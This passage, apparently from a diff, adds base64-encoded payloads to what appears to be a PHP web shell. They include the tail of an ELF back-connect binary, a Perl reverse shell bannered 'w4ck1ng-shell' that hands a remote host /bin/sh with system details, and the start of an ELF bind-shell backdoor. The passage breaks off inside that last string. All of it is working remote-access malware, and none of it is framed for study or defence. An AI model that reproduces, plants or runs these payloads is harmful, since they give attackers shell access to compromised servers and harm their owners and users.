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AF9zdGFydABzdHJsZW5AQEdMSUJDXzIuMABfX2ZpbmlfYXJyYXlfc3RhcnQAX19saWJjX2NzdV9pbml0AGluZXRfYWRkckBAR0xJQkNfMi4wAF9fYnNzX3N0YXJ0AG1haW4AX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfZW5kAGR1cDJAQEdMSUJDXzIuMABzdHJjYXRAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AF9maW5pAF9fcHJlaW5pdF9hcnJheV9lbmQAYnplcm9AQEdMSUJDXzIuMABleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABodG9uc0BAR0xJQkNfMi4wAGNvbm5lY3RAQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfc3RhcnQAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19wcmVpbml0X2FycmF5X3N0YXJ0AF9fZ21vbl9zdGFydF9fAA==";
+
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7DQokc3lzdGVtMj0gJ2VjaG8gImBwd2RgIjsnOw0KJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsNCiRzeXN0ZW00PSAnL2Jpbi9zaCc7DQokMD0kY21kOw0KJHRhcmdldD0kQVJHVlswXTsNCiRwb3J0PSRBUkdWWzFdOw0KJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOw0KcHJpbnQgIlxuXG46OiB3NGNrMW5nLXNoZWxsIChQcml2YXRlIEJ1aWxkIHYwLjMpIHJldmVyc2Ugc2hlbGwgOjpcblxuIjsNCnByaW50ICJcblN5c3RlbSBJbmZvOiAiOyANCnN5c3RlbSgkc3lzdGVtKTsNCnByaW50ICJcbllvdXIgSUQ6ICI7IA0Kc3lzdGVtKCRzeXN0ZW0xKTsNCnByaW50ICJcbkN1cnJlbnQgRGlyZWN0b3J5OiAiOyANCnN5c3RlbSgkc3lzdGVtMik7DQpwcmludCAiXG4iOw0Kc3lzdGVtKCRzeXN0ZW0zKTsgc3lzdGVtKCRzeXN0ZW00KTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+
+$backdoor="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAAD4EgAAAAAAADQAIAAHACgAIgAfAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIrAkAAKwJAAAFAAAAABAAAAEAAACsCQAArJkECKyZBAg0AQAAOAEAAAYAAAAAEAAAAgAAAMAJAADAmQQIwJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAAAAAAABEAAAATAAAAAAAAAAAAAAAQAAAAEQAAAAAAAAAAAAAACQAAAAgAAAAFAAAAAwAAAA0AAAAAAAAAAAAAAA8AAAAKAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAABAAAAAAAAAAcAAAALAAAAAAAAAAQAAAAMAAAADgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4AAAAAAAAAdQEAABIAAACgAAAAAAAAAHEAAAASAAAANAAAAAAAAADMAAAAEgAAAGoAAAAAAAAAWgAAABIAAABMAAAAAAAAAHgAAAASAAAAYwAAAAAAAAA5AAAAEgAAAFgAAAAAAAAAOQAAABIAAACOAAAAAAAAAOYAAAASAAAAOwAAAAAAAAA6AAAAEgAAAFMAAAAAAAAAOQAAABIAAAB1AAAAAAAAALkAAAASAAAAegAAAAAAAAArAAAAEgAAAEcAAAAAAAAAeAAAABIAAABvAAAAAAAAAA4AAAASAAAAfwAAAEiJBAgEAAAAEQAOAEAAAAAAAAAAOQAAABIAAAABAAAAAAAAAAAAAAAgAAAAFQAAAAAAAAAAAAAAIAAAAABfSnZfUmVnaXN0ZXJDbGFzc2VzAF9fZ21vbl9zdGFydF9fAGxpYmMuc28uNgBleGVjbABwZXJyb3IAZHVwMgBzb2NrZXQAc2VuZABhY2NlcHQAYmluZABzZXRzb2Nrb3B0AGxpc3RlbgBmb3JrAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABfX2xpYmNfc3RhcnRfbWFpbgBjbG9zZQBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAQACAAAAAAAAAAEAAQAkAAAAEAAAAAAAAAAQaWkNAAACAKYAAAAAAAAAiJoECAYSAACYmgQIBwEAAJyaBAgHAgAAoJoECAcDAACkmgQIBwQAAKiaBAgHBQAArJoECAcGAACwmgQIBwcAALSaBAgHCAAAuJoECAcJAAC8mgQIBwoAAMCaBAgHCwAAxJoECAcMAADImgQIBw0AAMyaBAgHDgAA0JoECAcQAABVieWD7AjoMQEAAOiDAQAA6FsEAADJwwD/NZCaBAj/JZSaBAgAAAAA/yWYmgQIaAAAAADp4P////8lnJoECGgIAAAA6dD/////JaCaBAhoEAAAAOnA/////yWkmgQIaBgAAADpsP////8lqJoECGggAAAA6aD/////JayaBAhoKAAAAOmQ/////yWwmgQIaDAAAADpgP////8ltJoECGg4AAAA6XD/////JbiaBAhoQAAAAOlg/////yW8mgQIaEgAAADpUP////8lwJoECGhQAAAA6UD/////JcSaBAhoWAAAAOkw/////yXImgQIaGAAAADpIP////8lzJoECGhoAAAA6RD/////JdCaBAhocAAAAOkA////Me1eieGD5PBQVFJorYgECGhciAQIUVZoQIYECOhf////9JCQVYnlU+gbAAAAgcO/FAAAg+wEi4P8////hcB0Av/Qg8QEW13Dixwkw1WJ5YPsCIA94JoECAB0DOscg8AEo9yaBAj/0qHcmgQIixCF0nXrxgXgmgQIAcnDVYnlg+wIobyZBAiFwHQSuAAAAACFwHQJxwQkvJkECP/QycOQkFWJ5VeD7GSD5PC4AAAAAIPAD4PAD8HoBMHgBCnEx0XkAQAAAMdF+EyJBAjHRCQIAAAAAMdEJAQBAAAAxwQkAgAAAOgJ////iUXwg33wAHkYxwQkjIkECOg0/v//xwQkAQAAAOio/v//ZsdF1AIAx0XYAAAAAItFDIPABIsAiQQk6Jv+//8Pt8CJBCTosP7//2aJRdbHRCQQBAAAAI1F5IlEJAzHRCQIAgAAAMdEJAQBAAAAi0XwiQQk6BL+//+NRdTHRCQIEAAA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